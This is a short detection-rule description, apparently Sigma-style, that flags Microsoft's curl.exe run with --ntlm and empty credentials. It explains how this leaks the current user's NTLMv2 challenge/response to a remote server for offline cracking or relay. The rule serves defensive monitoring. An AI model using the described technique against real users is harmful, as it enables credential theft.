Detects the use of the Microsoft-supplied curl.exe with NTLM authentication and empty credentials (-u :) during Windows process creation. When no credentials are provided, curl’s SSPI integration uses the current user’s logon session credentials stored in LSASS, potentially leaking the NTLMv2 challenge/response to a remote server. This behavior is specific to the curl binary shipped by Microsoft (Windows 10 / Windows Server 2019+), which is built with SSPI support. The rule flags: (1) a curl.exe process (path ends with \curl.exe or OriginalFileName curl.exe), (2) a CommandLine containing --ntlm, and (3) a CommandLine containing an empty credentials indicator (-u:). This combination can enable offline cracking or relay attacks against the current user’s credentials.